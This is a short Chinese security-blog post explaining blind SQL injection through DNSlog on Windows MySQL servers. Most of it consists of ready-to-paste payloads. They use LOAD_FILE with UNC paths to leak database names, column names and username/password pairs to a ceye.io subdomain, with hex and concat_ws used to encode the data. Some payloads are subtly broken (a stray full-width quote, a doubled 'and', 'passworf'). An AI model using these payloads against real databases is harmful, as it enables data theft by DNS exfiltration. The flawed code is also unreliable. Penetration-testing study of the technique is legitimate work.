DNSlog盲注

  • A+
所属分类:安全博客

通过发送构造好的语句函数,发送后服务器访问指定DNSlog网站从而获得信息,DNSlog注入缓解无回显,请求次数过多的的情况

DNSlog平台:ceye.io

利用load_file()

核心语法:

1
SELECT LOAD_FILE(CONCAT('\\',(select database()),'.mysql.r4ourp.ceye.io\abc'));

前提:

  1. 目标要为windows系统
  2. sql语句部分不能存在特殊符号

说明:

select database()为插入的sql语句。

前后为函数的填充。

食用方法:

1
1‘ and SELECT LOAD_FILE(CONCAT('\\',(select database()),'.mysql.r4ourp.ceye.io\abc'))--+
1
1‘ and and SELECT LOAD_FILE(CONCAT('\\',(select column_name from information_schema.columns where table_name="users" limit 1,1),'.mysql.r4ourp.ceye.io\abc'))--+

然后去DNSlog平台去看返回内容即可。

由于插入语句不能含特殊符号,在取数据下来时不好判断,可用使用

1
concat_ws('A',username,passworf)

分割.

或者通过hex转换

1
hex(concat_ws('A',username,passworf))

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: VulnHub-[DC-1-7]-系列通关手册

DC1-通关手册 DC系列的靶机是一个专门构建的易受攻击的实验室,总共有九个!目的是获得渗透测试领域的经验。 它的设计初学者是一个挑战,但是它的难易程度取决于您的技能和知识以及学习能力。 要成功完成此挑战,您需要具备Linux技能,熟悉Linux命令行以及具有…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: